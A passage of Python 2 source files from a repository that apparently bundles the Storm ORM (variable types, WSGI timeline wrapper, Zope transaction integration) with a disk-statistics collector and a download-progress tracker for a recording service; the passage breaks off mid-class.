"arguments are associated with")
for key, value in kwargs.items():
equals.append(getattr(cls, key) == value)
if equals:
return And(*equals)
return Undef
def replace_columns(expr, columns):
if isinstance(expr, Select):
select = copy(expr)
select.columns = columns
# Remove the ordering if it won't affect the result of the query.
if select.limit is Undef and select.offset is Undef:
select.order_by = Undef
return select
elif isinstance(expr, SetExpr):
# The ORDER BY clause might refer to columns we have replaced.
# Luckily we can ignore it if there is no limit/offset.
if expr.order_by is not Undef and (
expr.limit is not Undef or expr.offset is not Undef):
raise FeatureError(
"__contains__() does not yet support set "
"expressions that combine ORDER BY with "
"LIMIT/OFFSET")
subexprs = [replace_columns(subexpr, columns)
for subexpr in expr.exprs]
return expr.__class__(
all=expr.all, limit=expr.limit, offset=expr.offset,
*subexprs)
else:
raise FeatureError(
"__contains__() does not yet support %r expressions"
% (expr.__class__,))
class AutoReload(LazyValue):
"""A marker for reloading a single value.
Often this will be used to specify that a specific attribute
should be loaded from the database on the next access, like so::
storm_object.property = AutoReload
On the next access to C{storm_object.property}, the value will be
loaded from the database.
It is also often used as a default value for a property::
class Person(object):
__storm_table__ = "person"
id = Int(allow_none=False, default=AutoReload)
person = store.add(Person)
person.id # gets the attribute from the database.
"""
pass
AutoReload = AutoReload()
```
#### File: db/storm/variables.py
```python
from datetime import datetime, date, time, timedelta
from decimal import Decimal
import cPickle as pickle
import re
try:
import uuid
except ImportError:
uuid = None
from storm.compat import json
from storm.exceptions import NoneError
from storm import Undef, has_cextensions
__all__ = [
"VariableFactory",
"Variable",
"LazyValue",
"BoolVariable",
"IntVariable",
"FloatVariable",
"DecimalVariable",
"RawStrVariable",
"UnicodeVariable",
"DateTimeVariable",
"DateVariable",
"TimeVariable",
"TimeDeltaVariable",
"EnumVariable",
"UUIDVariable",
"PickleVariable",
"JSONVariable",
"ListVariable",
]
class LazyValue(object):
"""Marker to be used as a base class on lazily evaluated values."""
__slots__ = ()
def raise_none_error(column):
if not column:
raise NoneError("None isn't acceptable as a value")
else:
from storm.expr import compile, CompileError
name = column.name
if column.table is not Undef:
try:
table = compile(column.table)
name = "%s.%s" % (table, name)
except CompileError:
pass
raise NoneError("None isn't acceptable as a value for %s" % name)
def VariableFactory(cls, **old_kwargs):
"""Build cls with kwargs of constructor updated by kwargs of call.
This is really an implementation of partial/curry functions, and
is replaced by 'partial' when 2.5+ is in use.
"""
def variable_factory(**new_kwargs):
kwargs = old_kwargs.copy()
kwargs.update(new_kwargs)
return cls(**kwargs)
return variable_factory
try:
from functools import partial as VariableFactory
except ImportError:
pass
class Variable(object):
"""Basic representation of a database value in Python.
@type column: L{storm.expr.Column}
@ivar column: The column this variable represents.
@type event: L{storm.event.EventSystem}
@ivar event: The event system on which to broadcast events. If
None, no events will be emitted.
"""
_value = Undef
_lazy_value = Undef
_checkpoint_state = Undef
_allow_none = True
_validator = None
_validator_object_factory = None
_validator_attribute = None
column = None
event = None
def __init__(self, value=Undef, value_factory=Undef, from_db=False,
allow_none=True, column=None, event=None, validator=None,
validator_object_factory=None, validator_attribute=None):
"""
@param value: The initial value of this variable. The default
behavior is for the value to stay undefined until it is
set with L{set}.
@param value_factory: If specified, this will immediately be
called to get the initial value.
@param from_db: A boolean value indicating where the initial
value comes from, if C{value} or C{value_factory} are
specified.
@param allow_none: A boolean indicating whether None should be
allowed to be set as the value of this variable.
@param validator: Validation function called whenever trying to
set the variable to a non-db value. The function should
look like validator(object, attr, value), where the first and
second arguments are the result of validator_object_factory()
(or None, if this parameter isn't provided) and the value of
validator_attribute, respectively. When called, the function
should raise an error if the value is unacceptable, or return
the value to be used in place of the original value otherwise.
@type column: L{storm.expr.Column}
@param column: The column that this variable represents. It's
used for reporting better error messages.
@type event: L{EventSystem}
@param event: The event system to broadcast messages with. If
not specified, then no events will be broadcast.
"""
if not allow_none:
self._allow_none = False
if value is not Undef:
self.set(value, from_db)
elif value_factory is not Undef:
self.set(value_factory(), from_db)
if validator is not None:
self._validator = validator
self._validator_object_factory = validator_object_factory
self._validator_attribute = validator_attribute
self.column = column
self.event = event
def get_lazy(self, default=None):
"""Get the current L{LazyValue} without resolving its value.
@param default: If no L{LazyValue} was previously specified,
return this value. Defaults to None.
"""
if self._lazy_value is Undef:
return default
return self._lazy_value
def get(self, default=None, to_db=False):
"""Get the value, resolving it from a L{LazyValue} if necessary.
If the current value is an instance of L{LazyValue}, then the
C{resolve-lazy-value} event will be emitted, to give third
parties the chance to resolve the lazy value to a real value.
@param default: Returned if no value has been set.
@param to_db: A boolean flag indicating whether this value is
destined for the database.
"""
if self._lazy_value is not Undef and self.event is not None:
self.event.emit("resolve-lazy-value", self, self._lazy_value)
value = self._value
if value is Undef:
return default
if value is None:
return None
return self.parse_get(value, to_db)
def set(self, value, from_db=False):
"""Set a new value.
Generally this will be called when an attribute was set in
Python, or data is being loaded from the database.
If the value is different from the previous value (or it is a
L{LazyValue}), then the C{changed} event will be emitted.
@param value: The value to set. If this is an instance of
L{LazyValue}, then later calls to L{get} will try to
resolve the value.
@param from_db: A boolean indicating whether this value has
come from the database.
"""
# FASTPATH This method is part of the fast path. Be careful when
# changing it (try to profile any changes).
if isinstance(value, LazyValue):
self._lazy_value = value
self._checkpoint_state = new_value = Undef
else:
if not from_db and self._validator is not None:
# We use a factory rather than the object itself to prevent
# the cycle object => obj_info => variable => object
value = self._validator(self._validator_object_factory and
self._validator_object_factory(),
self._validator_attribute, value)
self._lazy_value = Undef
if value is None:
if self._allow_none is False:
raise_none_error(self.column)
new_value = None
else:
new_value = self.parse_set(value, from_db)
if from_db:
# Prepare it for being used by the hook below.
value = self.parse_get(new_value, False)
old_value = self._value
self._value = new_value
if (self.event is not None and
(self._lazy_value is not Undef or new_value != old_value)):
if old_value is not None and old_value is not Undef:
old_value = self.parse_get(old_value, False)
self.event.emit("changed", self, old_value, value, from_db)
def delete(self):
"""Delete the internal value.
If there was a value set, then emit the C{changed} event.
"""
old_value = self._value
if old_value is not Undef:
self._value = Undef
if self.event is not None:
if old_value is not None and old_value is not Undef:
old_value = self.parse_get(old_value, False)
self.event.emit("changed", self, old_value, Undef, False)
def is_defined(self):
"""Check whether there is currently a value.
@return: boolean indicating whether there is currently a value
for this variable. Note that if a L{LazyValue} was
previously set, this returns False; it only returns True if
there is currently a real value set.
"""
return self._value is not Undef
def has_changed(self):
"""Check whether the value has changed.
@return: boolean indicating whether the value has changed
since the last call to L{checkpoint}.
"""
return (self._lazy_value is not Undef or
self.get_state() != self._checkpoint_state)
def get_state(self):
"""Get the internal state of this object.
@return: A value which can later be passed to L{set_state}.
"""
return (self._lazy_value, self._value)
def set_state(self, state):
"""Set the internal state of this object.
@param state: A result from a previous call to
L{get_state}. The internal state of this variable will be set
to the state of the variable which get_state was called on.
"""
self._lazy_value, self._value = state
def checkpoint(self):
""""Checkpoint" the internal state.
See L{has_changed}.
"""
self._checkpoint_state = self.get_state()
def copy(self):
"""Make a new copy of this Variable with the same internal state."""
variable = self.__class__.__new__(self.__class__)
variable.set_state(self.get_state())
return variable
def parse_get(self, value, to_db):
"""Convert the internal value to an external value.
Get a representation of this value either for Python or for
the database. This method is only intended to be overridden
in subclasses, not called from external code.
@param value: The value to be converted.
@param to_db: Whether or not this value is destined for the
database.
"""
return value
def parse_set(self, value, from_db):
"""Convert an external value to an internal value.
A value is being set either from Python code or from the
database. Parse it into its internal representation. This
method is only intended to be overridden in subclasses, not
called from external code.
@param value: The value, either from Python code setting an
attribute or from a column in a database.
@param from_db: A boolean flag indicating whether this value
is from the database.
"""
return value
if has_cextensions:
from storm.cextensions import Variable
class BoolVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if not isinstance(value, (int, long, float, Decimal)):
raise TypeError("Expected bool, found %r: %r"
% (type(value), value))
return bool(value)
class IntVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if not isinstance(value, (int, long, float, Decimal)):
raise TypeError("Expected int, found %r: %r"
% (type(value), value))
return int(value)
class FloatVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if not isinstance(value, (int, long, float, Decimal)):
raise TypeError("Expected float, found %r: %r"
% (type(value), value))
return float(value)
class DecimalVariable(Variable):
__slots__ = ()
@staticmethod
def parse_set(value, from_db):
if (from_db and isinstance(value, basestring) or
isinstance(value, (int, long))):
value = Decimal(value)
elif not isinstance(value, Decimal):
raise TypeError("Expected Decimal, found %r: %r"
% (type(value), value))
return value
@staticmethod
def parse_get(value, to_db):
if to_db:
return unicode(value)
return value
class RawStrVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if isinstance(value, buffer):
value = str(value)
elif not isinstance(value, str):
raise TypeError("Expected str, found %r: %r"
% (type(value), value))
return value
class UnicodeVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if not isinstance(value, unicode):
raise TypeError("Expected unicode, found %r: %r"
% (type(value), value))
return value
class DateTimeVariable(Variable):
__slots__ = ("_tzinfo",)
def __init__(self, *args, **kwargs):
self._tzinfo = kwargs.pop("tzinfo", None)
super(DateTimeVariable, self).__init__(*args, **kwargs)
def parse_set(self, value, from_db):
if from_db:
if isinstance(value, datetime):
pass
elif isinstance(value, (str, unicode)):
if " " not in value:
raise ValueError("Unknown date/time format: %r" % value)
date_str, time_str = value.split(" ")
value = datetime(*(_parse_date(date_str) +
_parse_time(time_str)))
else:
raise TypeError("Expected datetime, found %s" % repr(value))
if self._tzinfo is not None:
if value.tzinfo is None:
value = value.replace(tzinfo=self._tzinfo)
else:
value = value.astimezone(self._tzinfo)
else:
if type(value) in (int, long, float):
value = datetime.utcfromtimestamp(value)
elif not isinstance(value, datetime):
raise TypeError("Expected datetime, found %s" % repr(value))
if self._tzinfo is not None:
value = value.astimezone(self._tzinfo)
return value
class DateVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if from_db:
if value is None:
return None
if isinstance(value, datetime):
return value.date()
if isinstance(value, date):
return value
if not isinstance(value, (str, unicode)):
raise TypeError("Expected date, found %s" % repr(value))
if " " in value:
value, time_str = value.split(" ")
return date(*_parse_date(value))
else:
if isinstance(value, datetime):
return value.date()
if not isinstance(value, date):
raise TypeError("Expected date, found %s" % repr(value))
return value
class TimeVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if from_db:
# XXX Can None ever get here, considering that set() checks for it?
if value is None:
return None
if isinstance(value, time):
return value
if not isinstance(value, (str, unicode)):
raise TypeError("Expected time, found %s" % repr(value))
if " " in value:
date_str, value = value.split(" ")
return time(*_parse_time(value))
else:
if isinstance(value, datetime):
return value.time()
if not isinstance(value, time):
raise TypeError("Expected time, found %s" % repr(value))
return value
class TimeDeltaVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
if from_db:
# XXX Can None ever get here, considering that set() checks for it?
if value is None:
return None
if isinstance(value, timedelta):
return value
if not isinstance(value, (str, unicode)):
raise TypeError("Expected timedelta, found %s" % repr(value))
return _parse_interval(value)
else:
if not isinstance(value, timedelta):
raise TypeError("Expected timedelta, found %s" % repr(value))
return value
class UUIDVariable(Variable):
__slots__ = ()
def parse_set(self, value, from_db):
assert uuid is not None, "The uuid module was not found."
if from_db and isinstance(value, basestring):
value = uuid.UUID(value)
elif not isinstance(value, uuid.UUID):
raise TypeError("Expected UUID, found %r: %r"
% (type(value), value))
return value
def parse_get(self, value, to_db):
if to_db:
return unicode(value)
return value
class EnumVariable(Variable):
__slots__ = ("_get_map", "_set_map")
def __init__(self, get_map, set_map, *args, **kwargs):
self._get_map = get_map
self._set_map = set_map
Variable.__init__(self, *args, **kwargs)
def parse_set(self, value, from_db):
if from_db:
return value
try:
return self._set_map[value]
except KeyError:
raise ValueError("Invalid enum value: %s" % repr(value))
def parse_get(self, value, to_db):
if to_db:
return value
try:
return self._get_map[value]
except KeyError:
raise ValueError("Invalid enum value: %s" % repr(value))
class MutableValueVariable(Variable):
"""
A variable which contains a reference to mutable content. For this kind
of variable, we can't simply detect when a modification has been made, so
we have to synchronize the content of the variable when the store is
flushing current objects, to check if the state has changed.
"""
__slots__ = ("_event_system")
def __init__(self, *args, **kwargs):
self._event_system = None
Variable.__init__(self, *args, **kwargs)
if self.event is not None:
self.event.hook("start-tracking-changes", self._start_tracking)
self.event.hook("object-deleted", self._detect_changes_and_stop)
def _start_tracking(self, obj_info, event_system):
self._event_system = event_system
self.event.hook("stop-tracking-changes", self._stop_tracking)
def _stop_tracking(self, obj_info, event_system):
event_system.unhook("flush", self._detect_changes)
self._event_system = None
def _detect_changes(self, obj_info):
if (self._checkpoint_state is not Undef and
self.get_state() != self._checkpoint_state):
self.event.emit("changed", self, None, self._value, False)
def _detect_changes_and_stop(self, obj_info):
self._detect_changes(obj_info)
if self._event_system is not None:
self._stop_tracking(obj_info, self._event_system)
def get(self, default=None, to_db=False):
if self._event_system is not None:
self._event_system.hook("flush", self._detect_changes)
return super(MutableValueVariable, self).get(default, to_db)
def set(self, value, from_db=False):
if self._event_system is not None:
if isinstance(value, LazyValue):
self._event_system.unhook("flush", self._detect_changes)
else:
self._event_system.hook("flush", self._detect_changes)
super(MutableValueVariable, self).set(value, from_db)
class EncodedValueVariable(MutableValueVariable):
__slots__ = ()
def parse_set(self, value, from_db):
if from_db:
if isinstance(value, buffer):
value = str(value)
return self._loads(value)
else:
return value
def parse_get(self, value, to_db):
if to_db:
return self._dumps(value)
else:
return value
def get_state(self):
return (self._lazy_value, self._dumps(self._value))
def set_state(self, state):
self._lazy_value = state[0]
self._value = self._loads(state[1])
class PickleVariable(EncodedValueVariable):
def _loads(self, value):
return pickle.loads(value)
def _dumps(self, value):
return pickle.dumps(value, -1)
class JSONVariable(EncodedValueVariable):
__slots__ = ()
def __init__(self, *args, **kwargs):
assert json is not None, (
"Neither the json nor the simplejson module was found.")
super(JSONVariable, self).__init__(*args, **kwargs)
def _loads(self, value):
if not isinstance(value, unicode):
raise TypeError(
"Cannot safely assume encoding of byte string %r." % value)
return json.loads(value)
def _dumps(self, value):
# http://www.ietf.org/rfc/rfc4627.txt states that JSON is text-based
# and so we treat it as such here. In other words, this method returns
# unicode and never str.
dump = json.dumps(value, ensure_ascii=False)
if not isinstance(dump, unicode):
# json.dumps() does not always return unicode. See
# http://code.google.com/p/simplejson/issues/detail?id=40 for one
# of many discussions of str/unicode handling in simplejson.
dump = dump.decode("utf-8")
return dump
class ListVariable(MutableValueVariable):
__slots__ = ("_item_factory",)
def __init__(self, item_factory, *args, **kwargs):
self._item_factory = item_factory
MutableValueVariable.__init__(self, *args, **kwargs)
def parse_set(self, value, from_db):
if from_db:
item_factory = self._item_factory
return [item_factory(value=val, from_db=from_db).get()
for val in value]
else:
return value
def parse_get(self, value, to_db):
if to_db:
item_factory = self._item_factory
return [item_factory(value=val, from_db=False) for val in value]
else:
return value
def get_state(self):
return (self._lazy_value, pickle.dumps(self._value, -1))
def set_state(self, state):
self._lazy_value = state[0]
self._value = pickle.loads(state[1])
def _parse_time(time_str):
# TODO Add support for timezones.
colons = time_str.count(":")
if not 1 <= colons <= 2:
raise ValueError("Unknown time format: %r" % time_str)
if colons == 2:
hour, minute, second = time_str.split(":")
else:
hour, minute = time_str.split(":")
second = "0"
if "." in second:
second, microsecond = second.split(".")
second = int(second)
microsecond = int(int(microsecond) * 10 ** (6 - len(microsecond)))
return int(hour), int(minute), second, microsecond
return int(hour), int(minute), int(second), 0
def _parse_date(date_str):
if "-" not in date_str:
raise ValueError("Unknown date format: %r" % date_str)
year, month, day = date_str.split("-")
return int(year), int(month), int(day)
def _parse_interval_table():
table = {}
for units, delta in (
("d day days", timedelta),
("h hour hours", lambda x: timedelta(hours=x)),
("m min minute minutes", lambda x: timedelta(minutes=x)),
("s sec second seconds", lambda x: timedelta(seconds=x)),
("ms millisecond milliseconds", lambda x: timedelta(milliseconds=x)),
("microsecond microseconds", lambda x: timedelta(microseconds=x))
):
for unit in units.split():
table[unit] = delta
return table
_parse_interval_table = _parse_interval_table()
_parse_interval_re = re.compile(r"[\s,]*"
r"([-+]?(?:\d\d?:\d\d?(?::\d\d?)?(?:\.\d+)?"
r"|\d+(?:\.\d+)?))"
r"[\s,]*")
def _parse_interval(interval):
result = timedelta(0)
value = None
for token in _parse_interval_re.split(interval):
if not token:
pass
elif ":" in token:
if value is not None:
result += timedelta(days=value)
value = None
h, m, s, ms = _parse_time(token)
result += timedelta(hours=h, minutes=m, seconds=s, microseconds=ms)
elif value is None:
try:
value = float(token)
except ValueError:
raise ValueError("Expected an interval value rather than "
"%r in interval %r" % (token, interval))
else:
unit = _parse_interval_table.get(token)
if unit is None:
raise ValueError("Unsupported interval unit %r in interval %r"
% (token, interval))
result += unit(value)
value = None
if value is not None:
result += timedelta(seconds=value)
return result
```
#### File: db/storm/wsgi.py
```python
import functools
import threading
__all__ = ['make_app']
def make_app(app):
"""Capture the per-request timeline object needed for storm tracing.
To use firstly make your app and then wrap it with this make_app::
>>> app, find_timeline = make_app(app)
Then wrap the returned app with the timeline app (or anything that sets
environ['timeline.timeline'])::
>>> app = timeline.wsgi.make_app(app)
Finally install a timeline tracer to capture storm queries::
>>> install_tracer(TimelineTracer(find_timeline))
@return: A wrapped WSGI app and a timeline factory function for use with
TimelineTracer.
"""
timeline_map = threading.local()
def wrapper(environ, start_response):
timeline = environ.get('timeline.timeline')
timeline_map.timeline = timeline
try:
gen = app(environ, start_response)
for bytes in gen:
yield bytes
finally:
del timeline_map.timeline
return wrapper, functools.partial(getattr, timeline_map, 'timeline', None)
```
#### File: storm/zope/zstorm.py
```python
import threading
import weakref
from zope.interface import implements
import transaction
from transaction.interfaces import IDataManager, ISynchronizer
try:
from transaction.interfaces import TransactionFailedError
except ImportError:
from ZODB.POSException import TransactionFailedError
from storm.zope.interfaces import IZStorm, ZStormError
from storm.database import create_database
from storm.store import Store
class ZStorm(object):
"""A utility which integrates Storm with Zope.
Typically, applications will register stores using ZCML similar
to::
<store name='main' uri='sqlite:' />
Application code can then acquire the store by name using code
similar to::
from zope.component import getUtility
from storm.zope.interfaces import IZStorm
store = getUtility(IZStorm).get('main')
"""
implements(IZStorm)
transaction_manager = transaction.manager
_databases = {}
def __init__(self):
self._local = threading.local()
self._default_databases = {}
self._default_uris = {}
def _reset(self):
for name, store in list(self.iterstores()):
self.remove(store)
store.close()
self._local = threading.local()
self._databases.clear()
self._default_databases.clear()
self._default_uris.clear()
@property
def _stores(self):
try:
return self._local.stores
except AttributeError:
stores = weakref.WeakValueDictionary()
return self._local.__dict__.setdefault("stores", stores)
@property
def _named(self):
try:
return self._local.named
except AttributeError:
return self._local.__dict__.setdefault("named", {})
@property
def _name_index(self):
try:
return self._local.name_index
except AttributeError:
return self._local.__dict__.setdefault(
"name_index", weakref.WeakKeyDictionary())
def _get_database(self, uri):
database = self._databases.get(uri)
if database is None:
return self._databases.setdefault(uri, create_database(uri))
return database
def set_default_uri(self, name, default_uri):
"""Set C{default_uri} as the default URI for stores called C{name}."""
self._default_databases[name] = self._get_database(default_uri)
self._default_uris[name] = default_uri
def create(self, name, uri=None):
"""Create a new store called C{name}.
@param uri: Optionally, the URI to use.
@raises ZStormError: Raised if C{uri} is None and no default
URI exists for C{name}. Also raised if a store with
C{name} already exists.
"""
if uri is None:
database = self._default_databases.get(name)
if database is None:
raise ZStormError("Store named '%s' not found" % name)
else:
database = self._get_database(uri)
if name is not None and self._named.get(name) is not None:
raise ZStormError("Store named '%s' already exists" % name)
store = Store(database)
store._register_for_txn = True
store._event.hook(
"register-transaction", register_store_with_transaction,
weakref.ref(self))
self._stores[id(store)] = store
if name is not None:
self._named[name] = store
self._name_index[store] = name
return store
def get(self, name, default_uri=None):
"""Get the store called C{name}, creating it first if necessary.
@param default_uri: Optionally, the URI to use to create a
store called C{name} when one doesn't already exist.
@raises ZStormError: Raised if C{uri} is None and no default
URI exists for C{name}.
"""
store = self._named.get(name)
if not store:
return self.create(name, default_uri)
return store
def remove(self, store):
"""Remove the given store from ZStorm.
This removes any management of the store from ZStorm.
Notice that if the store was used inside the current
transaction, it's probably joined the transaction system as
a resource already, and thus it will commit/rollback when
the transaction system requests so.
This method will unlink the *synchronizer* from the transaction
system, so that once the current transaction is over it won't
link back to it in future transactions.
"""
del self._stores[id(store)]
name = self._name_index[store]
del self._name_index[store]
if name in self._named:
del self._named[name]
# Make sure the store isn't hooked up to future transactions.
store._register_for_txn = False
store._event.unhook(
"register-transaction", register_store_with_transaction,
weakref.ref(self))
def iterstores(self):
"""Iterate C{name, store} 2-tuples."""
# items is explicitly used here, instead of iteritems, to
# avoid the problem where a store is deallocated during
# iteration causing RuntimeError: dictionary changed size
# during iteration.
for store, name in self._name_index.items():
yield name, store
def get_name(self, store):
"""Returns the name for C{store} or None if one isn't available."""
return self._name_index.get(store)
def get_default_uris(self):
"""
Return a list of name, uri tuples that are named as the default
databases for those names.
"""
return self._default_uris.copy()
def register_store_with_transaction(store, zstorm_ref):
zstorm = zstorm_ref()
if zstorm is None:
# zstorm object does not exist any more.
return False
# Check if the store is known. This could indicate a store being
# used outside of its thread.
if id(store) not in zstorm._stores:
raise ZStormError("Store not registered with ZStorm, or registered "
"with another thread.")
data_manager = StoreDataManager(store, zstorm)
zstorm.transaction_manager.get().join(data_manager)
# Unhook the event handler. It will be rehooked for the next transaction.
return False
class StoreDataManager(object):
"""An L{IDataManager} implementation for C{ZStorm}."""
implements(IDataManager)
def __init__(self, store, zstorm):
self._store = store
self._zstorm = zstorm
self.transaction_manager = zstorm.transaction_manager
def abort(self, txn):
try:
self._store.rollback()
finally:
if self._store._register_for_txn:
self._store._event.hook(
"register-transaction", register_store_with_transaction,
weakref.ref(self._zstorm))
def tpc_begin(self, txn):
# Zope's transaction system will call tpc_begin() on all
# managers before calling commit, so flushing here may help
# in cases where there are two stores with changes, and one
# of them will fail. In such cases, flushing earlier will
# ensure that both transactions will be rolled back, instead
# of one committed and one rolled back.
self._store.flush()
def commit(self, txn):
try:
self._store.commit()
finally:
if self._store._register_for_txn:
self._store._event.hook(
"register-transaction", register_store_with_transaction,
weakref.ref(self._zstorm))
def tpc_vote(self, txn):
pass
def tpc_finish(self, txn):
pass
def tpc_abort(self, txn):
pass
def sortKey(self):
return "store_%d" % id(self)
global_zstorm = ZStorm()
try:
from zope.testing.cleanup import addCleanUp
except ImportError:
# We don't have zope.testing installed.
pass
else:
addCleanUp(global_zstorm._reset)
del addCleanUp
```
#### File: PI-slim-napa/recdopt_py/disk_stats.py
```python
import os
import sys
import time
from common.stoppable_thread import StoppableThread
import logging
logger = logging.getLogger('recd')
from mysql import *
# Stat()
# Reads disk statistics from /sys/block/<dev>/stat
# The format of the statistics in that file are as follows:
# Field 1 -- # of reads completed
# This is the total number of reads completed successfully.
# Field 2 -- # of reads merged,
# Reads and writes which are adjacent to each other may be merged for
# efficiency. Thus two 4K reads may become one 8K read before it is
# ultimately handed to the disk, and so it will be counted (and queued)
# as only one I/O. This field lets you know how often this was done.
# Field 3 -- # of sectors read
# This is the total number of sectors read successfully.
# Field 4 -- # of milliseconds spent reading
# This is the total number of milliseconds spent by all reads (as
# measured from __make_request() to end_that_request_last()).
# Field 5 -- # of writes completed
# This is the total number of writes completed successfully.
# Field 6 -- # of writes merged
# Field 7 -- # of sectors written
# This is the total number of sectors written successfully.
# Field 8 -- # of milliseconds spent writing
# This is the total number of milliseconds spent by all writes (as
# measured from __make_request() to end_that_request_last()).
# Field 9 -- # of I/Os currently in progress
# The only field that should go to zero. Incremented as requests are
# given to appropriate struct request_queue and decremented as they finish.
# Field 10 -- # of milliseconds spent doing I/Os
# This field increases so long as field 9 is nonzero.
# Field 11 -- weighted # of milliseconds spent doing I/Os
# This field is incremented at each I/O start, I/O completion, I/O
# merge, or read of these stats by the number of I/Os in progress
# (field 9) times the number of milliseconds spent doing I/O since the
# last update of this field. This can provide an easy measure of both
# I/O completion time and the backlog that may be accumulating.
class Stat(object):
__db_table__ = 'disk_stats'
__db_columns__ = ['device',
'read_complete',
'read_merged',
'read_sectors',
'read_ms',
'write_complete',
'write_merged',
'write_sectors',
'write_ms',
'ios_in_prog',
'io_ms',
'weighted_io_ms',
'read_bytes',
'write_bytes',
'utilization']
READ_COMPLETE = 0
READ_MERGED = 1
READ_SECTORS = 2
READ_MS = 3
WRITE_COMPLETE = 4
WRITE_MERGED = 5
WRITE_SECTORS = 6
WRITE_MS = 7
IOS_IN_PROG = 8
IO_MS = 9
WEIGHTED_IO_MS = 10
def __init__(self,disk):
self.disk = disk
self.disk_ok = os.path.exists('/sys/block/'+disk+'/stat')
self.last = None
self.last_time = None
if not self.disk_ok:
logger.warning('Disk %s does not exist. Ignoring.' % disk)
return
# Find the sector size to determine the number of bytes read/written
self.sector_size = int(file('/sys/block/'+self.disk+'/queue/hw_sector_size','r').read())
logger.info(disk + ': Sector Size is %d bytes.' % self.sector_size)
def called(self):
logger.info(self.disk + ' called')
def update(self):
stat = file('/sys/block/'+self.disk+'/stat','r').read()
cols = stat.split()
read_time = time.time()
# Startup
if self.last is None:
self.last_time = read_time
self.last = cols
return
# Use time difference to account for processing and sleep resolution
diff_time = read_time - self.last_time
# Build a list of differences
self.diff = [ int((int(col)-int(last))/diff_time) for last,col in zip(self.last,cols) ]
# IOs in progress is a queue length so it can go to zero. Do not subtract it
self.diff[Stat.IOS_IN_PROG] = int(cols[Stat.IOS_IN_PROG])
self.last_time = read_time
self.last = cols
def insert(self,options):
vals = []
# Disk Name
vals.append(self.disk)
# The 11 values which are diffed with the previous second
vals.extend(self.diff)
# Caluclated Columns
# read_bytes
vals.append(self.diff[Stat.READ_SECTORS]*self.sector_size)
# write_bytes
vals.append(self.diff[Stat.WRITE_SECTORS]*self.sector_size)
# utilization - max 100%
vals.append('%3.2f' % min((self.diff[Stat.IO_MS]/10.0),100.00))
# Insert into the db
db_insert_into(options,Stat.__db_table__,Stat.__db_columns__,vals)
class DiskStatsCleaner(StoppableThread):
def __init__(self,options):
super(DiskStatsCleaner, self).__init__()
self.options = options
def clean(self):
# Delete rows where the time is < the history amount
sql_where = "time < DATE_SUB(CURRENT_TIMESTAMP, INTERVAL %d HOUR)" % (self.options.disk_stats_history)
rows_deleted = db_delete_from(self.options,Stat.__db_table__,where=sql_where)
#logger.info("Cleaned: %d" % rows_deleted)
def __run__(self):
logger.info("DiskStatsCleaner Started")
loop = 0
while not self.stopped():
time.sleep(1)
loop+=1
# Check every minute
if loop % 60 == 0:
self.clean()
logger.info("DiskStatsCleaner Stopped")
class DiskStats(StoppableThread):
def __init__(self, options):
super(DiskStats, self).__init__()
self.options = options
self.cleaner = DiskStatsCleaner(options)
def __run__(self):
logger.info("DiskStats Started")
self.cleaner.start()
disks = [Stat(device) for device in self.options.disk_stats_devices]
# Filter out disks we can't track
disks = filter(lambda d: d.disk_ok, disks)
# Exit if no devices to track
if len(disks) is 0:
logger.warning("No devices to track. Exiting")
self.cleaner.stop()
self.cleaner.join()
return
# Call update one on all first so they can get initial values
for disk in disks: disk.update()
# Break if the user stops
to_sleep = 1
while not self.stopped(timeout=to_sleep):
last = time.time()
# Split up the update from the insert
# This tries to get a snapshot of all the disks at the same time
for disk in disks: disk.update()
for disk in disks: disk.insert(self.options)
# Sleep the shortest amount of time possible so we get updates on the second boundary
to_sleep = 1-(time.time()-last)
if to_sleep < 0: to_sleep = 0
self.cleaner.stop()
self.cleaner.join()
self.cleaner.raise_exception(log=logger)
logger.info("DiskStats has stopped")
# Empty object that you can add fields to.
class Object(object):
pass
if __name__ == "__main__":
# print to stdout
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(name)s: %(funcName)s::%(filename)s:%(lineno)s %(message)s")
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
logger.addHandler(streamHandler)
logger.info('DiskStats Unit Testing')
# Fake options for testing
options = Object()
options.dbhostname = 'localhost'
options.dbusername = 'root'
options.dbpassword = '<PASSWORD>'
options.dbname = 'recd'
options.unit_test = False
options.disk_stats_devices = ['sda','sdb','sdc','sdd','sde']
options.disk_stats_history = 48 # hours
ds = DiskStats(options)
ds.start()
# Stop all threads for ctrl-c
while ds.isAlive():
try:
time.sleep(1)
except (KeyboardInterrupt, SystemExit):
break
logger.info('stop')
ds.stop()
logger.info('join')
ds.join()
logger.info('end')
ds.raise_exception(log=logger)
```
#### File: recdopt_py/download_manager/retrieval_progress.py
```python
import sys, time, logging,recdopt_context, ctypes, math
from recdopt_context import *
log = logging.getLogger('recd')
sys.path.append('..')
from common.time_utils import TimeUtils
#
# Base class for file retrieval queries, iterations, steps.
#
class RetrievalProgressBase:
def __init__(self):
self.startSecs = int(0)
self.progress = float(0.0)
self.progressPerc = float(0.0)
def Start(self):
self.startSecs = int(time.time())
self.progress = 0.0
self.progressPerc = 0.0
def SetProgress(self, progress):
self.progress = progress;
self.progressPerc = self.progress * 100.0
def IncrementProgress(self, incremental_progress):
self.progress += incremental_progress;
self.progressPerc = self.progress * 100.0
def Finished(self):
self.progress = 1.0
self.progressPerc = 100.0
#
# One step of a file retrieval query.
# Maintains progress of a single step of a query.
#
class RetrievalProgressStep(RetrievalProgressBase):
def __init__(self, step_index, step_weight):
RetrievalProgressBase.__init__(self)
self.index = int(step_index)
self.indexForGui = int(self.index + 1)
self.weight = step_weight
def IncrementProgress(self, incremental_progress):
RetrievalProgressBase.IncrementProgress(self, incremental_progress)
#log.info("""Incremented step progress by %s, new progress = %s""" % (incremental_progress, self.progress))
#
# One iteration of a file retrieval query, contains a list of steps.
# Maintains progress of a single iteration.
#
class RetrievalProgressIteration(RetrievalProgressBase):
def __init__(self, iter_index, iter_weight):
RetrievalProgressBase.__init__(self)
self.index = iter_index
self.indexForGui = int(self.index + 1)
self.weight = iter_weight
self.numSteps = 4
self.startTime = 0
# Figure out how much each step will contribute to the iteration.
